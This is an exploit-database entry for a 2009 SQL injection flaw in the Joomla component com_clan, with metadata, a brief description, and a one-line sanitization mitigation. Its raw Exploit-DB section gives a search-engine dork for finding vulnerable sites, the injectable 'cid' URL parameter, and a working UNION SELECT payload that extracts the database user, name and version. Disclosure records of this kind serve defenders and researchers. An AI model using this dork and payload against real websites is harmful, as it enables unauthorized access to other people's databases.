header-logo
Suggest Exploit
vendor:
com_clan
by:
AtT4CKxT3rR0r1ST
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_clan
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_clan Sql Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_clan. The vulnerability is due to insufficient sanitization of user-supplied input in the 'cid' parameter of the 'index.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's database.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

Joomla Component com_clan Sql Injection Vulnerability
==============================================================

http://joomlacode.org/gf/project/com_clan/

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_clan"

####################################################################
===[   Bug   ]===

www.site.com/index.php?action=com_clan&cid=185[Sql Injection]

===[ Exploit ]===

185+and+1=2+union+select+1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8

####################################################################